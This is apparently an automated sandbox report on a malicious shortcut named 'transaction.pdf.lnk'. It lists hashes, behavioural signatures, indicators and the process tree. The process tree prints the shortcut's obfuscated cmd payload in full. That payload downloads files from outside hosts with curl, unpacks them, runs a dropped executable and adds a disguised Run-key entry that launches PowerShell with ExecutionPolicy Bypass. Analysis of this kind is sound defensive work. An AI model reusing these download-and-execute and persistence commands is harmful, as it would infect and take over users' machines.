Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10/11/2024, 22:06
Static task
static1
Behavioral task
behavioral1
Sample
transaction.pdf.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
transaction.pdf.lnk
Resource
win10v2004-20241007-en
General
-
Target
transaction.pdf.lnk
-
Size
3KB
-
MD5
0a2f22c7a16adfe8fbfa67b77edc82b4
-
SHA1
c2556809eee64ec4061a50d4ea2ee41d6781371f
-
SHA256
d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb
-
SHA512
002bb80565514e02834f182f029f5eb0593d22e915aeb6014cf650ef38b93f0a5b8849e7dd766b4099d96025c083b7a0e6790f815e7eec14a5ee2d44ad4dfeac
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 26 2376 cscript.exe 46 2376 cscript.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation cscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 4088 ApplicationFrameHost.exe -
Loads dropped DLL 1 IoCs
pid Process 4088 ApplicationFrameHost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "wscript.exe C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\merge.ps1 KBKWGEBK" reg.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
pid Process 4816 powershell.exe 2192 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2192 powershell.exe 2192 powershell.exe 4816 powershell.exe 4816 powershell.exe 4816 powershell.exe 4816 powershell.exe 4816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 4916 wrote to memory of 4388 4916 cmd.exe 84 PID 4916 wrote to memory of 4388 4916 cmd.exe 84 PID 4388 wrote to memory of 4616 4388 cmd.exe 85 PID 4388 wrote to memory of 4616 4388 cmd.exe 85 PID 4616 wrote to memory of 3160 4616 cscript.exe 87 PID 4616 wrote to memory of 3160 4616 cscript.exe 87 PID 3160 wrote to memory of 5096 3160 cmd.exe 89 PID 3160 wrote to memory of 5096 3160 cmd.exe 89 PID 3160 wrote to memory of 1748 3160 cmd.exe 98 PID 3160 wrote to memory of 1748 3160 cmd.exe 98 PID 3160 wrote to memory of 2192 3160 cmd.exe 105 PID 3160 wrote to memory of 2192 3160 cmd.exe 105 PID 3160 wrote to memory of 4088 3160 cmd.exe 106 PID 3160 wrote to memory of 4088 3160 cmd.exe 106 PID 4088 wrote to memory of 2772 4088 ApplicationFrameHost.exe 107 PID 4088 wrote to memory of 2772 4088 ApplicationFrameHost.exe 107 PID 2772 wrote to memory of 4264 2772 wscript.exe 108 PID 2772 wrote to memory of 4264 2772 wscript.exe 108 PID 4264 wrote to memory of 3248 4264 cmd.exe 110 PID 4264 wrote to memory of 3248 4264 cmd.exe 110 PID 3248 wrote to memory of 4932 3248 wscript.exe 111 PID 3248 wrote to memory of 4932 3248 wscript.exe 111 PID 4932 wrote to memory of 4816 4932 cmd.exe 113 PID 4932 wrote to memory of 4816 4932 cmd.exe 113 PID 4816 wrote to memory of 2376 4816 powershell.exe 114 PID 4816 wrote to memory of 2376 4816 powershell.exe 114 PID 4264 wrote to memory of 3616 4264 cmd.exe 115 PID 4264 wrote to memory of 3616 4264 cmd.exe 115 PID 3616 wrote to memory of 2328 3616 wscript.exe 116 PID 3616 wrote to memory of 2328 3616 wscript.exe 116 PID 2328 wrote to memory of 4500 2328 cmd.exe 118 PID 2328 wrote to memory of 4500 2328 cmd.exe 118
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/KBKWGEBK/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""2⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\System32\cscript.execscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat4⤵
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\System32\curl.execurl -o C:\Users\Admin\AppData\Local\Temp\test.jpg https://drive.fileio.center/base1.jpg5⤵PID:5096
-
-
C:\Windows\System32\curl.execurl -L -o C:\Users\Admin\AppData\Local\Temp\base.zip http://170.75.168.151/KBKWGEBK/aaa5⤵PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exeC:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\System32\wscript.exewscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1" KBKWGEBK & wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f"6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK & wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f7⤵
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\System32\wscript.exewscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK8⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK9⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\system32\cscript.exe"C:\Windows\system32\cscript.exe" //nologo "C:\Users\Admin\AppData\Local\Microsoft\hello.js" KBKWGEBK11⤵
- Blocklisted process makes network request
PID:2376
-
-
-
-
-
C:\Windows\System32\wscript.exewscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f8⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f9⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\System32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f10⤵
- Adds Run key to start application
PID:4500
-
-
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5fe3aab3ae544a134b68e881b82b70169
SHA1926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6
SHA256bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b
SHA5123fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280
-
Filesize
1KB
MD5c0e79e67a9a209d37c9e3a9dd6437ab0
SHA1ce94d8bb54f007e7536727606f8120688da83cd4
SHA2567f07c943fdbd9ac658066c962b71b3d1f6f8b5d010b1c776c3eea7f3f737e0b0
SHA5120fff8b276c0efb570e0bcc414c376a27efa2edefab1a0afb7e470a73fd4c47b57846454c145105f935d9e12b4fa50d297e54ea29b09010ccb3ed9d7d1148269d
-
Filesize
7KB
MD5d3764fea6416c62582aae6f79759c2be
SHA1ffba6fe6ae16d9f1c191d462463a5aeec79eb5c7
SHA2560528254a5933622320e8a3aafdcf4d6e0c3a5b49bac2ff49a7c8b61ecd51b3b0
SHA5120da696218c879cda5917e3c81e050b62c83c0611d7825df36c3f971e4da63ecdfc66cc76338c00dbeec6de6c675004eaf2e9a7521580f932cbbc2838de2ceeac
-
Filesize
1KB
MD52c4ffae6bfebb1ee0035e1400034265d
SHA11f93c5cb3953f4a5927ab97eb1618f2c08c448a1
SHA2562fb855f25db72aebe25885ddd1c983b8769944ede510cc658c7d1c6bdd5787c3
SHA512860b4c29d06df1f07258f2b9ae7be5c9830d1bd7aa7ab827c823a6bc961739b6c358b8d5f1efe1b0df00eb398192a2f7495e14b19deafb535450ed72d1472aae
-
Filesize
1KB
MD5fc8b6f161d4f96d3d299400aa78914b7
SHA1dbe374b617e289f945608254583fc405489f68a5
SHA256bc995c4123c50cd55c83bf1d17815740aea9930863f82eb62936cc598769e46f
SHA51200b76152598a52ec391484969828084ead6f56092c26b47d583b10618caffc930e52b9ea48d9c631cd733f85acad32434434b985719f09580f2eb87731198c9c
-
Filesize
1KB
MD54c5b654dd985cb1757a4aa84545dc994
SHA10266eecac74bbb118780201100bcb8ec8aceef3c
SHA2567639b5d13dcb7090099326b883095771a63cfb7ff0315dbd78ba6060e4ff7e99
SHA51293615577bbccfc5d5328b016dfc5437bdbe19b354b245f760ded06b4165819ab8702de3876ae34b2d21376bdeab92ba6b74632c8a27038be06205417c068ecc0
-
Filesize
78KB
MD5db2fefe19f85e618f62686cf453df33c
SHA19a37897fb3e75074d451c87e5b3dd602545648a6
SHA25667077124e4a881dba9e4c6e65c8bb45d5ab14a429959f935f933f5824596e463
SHA512e4fb7dadd3ee954c0b46a95521a42cc076f77d75e9f3ce0ab68713a096b7a45b145723c27bb7d420c5cd5489d69867dc31175135a7efe397deab7bec43eab9c2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
634KB
MD5367a5951e81795113b8564546a8346c5
SHA1f5dede6905ce2f0ca23a8f29052c6cbfc66da404
SHA2564cf4e56b88e42327d3e0dfc48b99c05058df7f46d03dd08ed3295bb6b932ea77
SHA512061a0d8e9f3f06d036237091f06c92794156ca253004b82b4ecaa89d48052ae120ea9134fd3532911997e4c038ab7a932fc601d75ea86a7309fb0e255e13f488
-
Filesize
448B
MD5aa350b1db128975bd16e8c2c7c4df7f1
SHA17be6d97138179f8676740a4e0cbb660736183397
SHA25669d90278d0a0a757b0cc5fc04459d508edbd7e4a8eba6ae66a5fe84ca12af017
SHA51265e523b8a29ac68fd9b2e3afe8825b7506335050769cd39dffb1deb11454b67515fa3cd0a96eb54016540dd2e0dbed87dbbfb6f4ed1f283289f04168108571f6
-
Filesize
2.4MB
MD583ce934c9273a1daf846ccd0186e1497
SHA14439cd1642e8af4f4b6f709bd69ea6afabb62d80
SHA256bff92ebb960e6b5de169fe56e6ebd3862f7b0563ab38687c51d0e09d1bffc819
SHA512c2a6e76f8ce3e6d6378a4becf59b441eeec3b0e4d18e20153a61d6757f10d33425801a3b899527e142bc53307cab26d56fcb0a8472485430e5802dbc7faeec0f
-
Filesize
129B
MD588c7a65cabaeae2e10cbc7bd5608b28b
SHA1d6ee96710a99d0f65a867c6082148ae7a4981227
SHA256250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543
SHA512b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340
-
Filesize
6KB
MD5f230b7afc89267a9766f3406cb5dbddf
SHA106797eb37d26eb18757db1daff2d381ab25566ab
SHA256aa27582360eb94b77b942235e6fd1ea5d98fa73f447b8bdba818fcf5a40d09a4
SHA512c2cc1ecd7a70d73fd6f6471a7bf6e45dd11b0698d6beaf65922550489f40233de1a5ddd2a572dff2eb17a1b767ac53f105f0e2e6bad26ccc8193973e914a949a
-
Filesize
604B
MD566837cd467d2e7fb879f7f8a8a7c32c9
SHA170367364b2a4ccf95dc39edb3df96cb0bddbce5b
SHA2567904f5905e21ddb8ee0bcaa03e009683b0e5995d7b3b64a5d8fac3cea434eaf5
SHA5128ed864277d19143bd9f073f56eff6720d882cdf7022e1ff996f17d4cb256ed59fee13fd0fe6bdce6c0a26bd45a322142d38fc473d3a6456bc9c211f709baf05a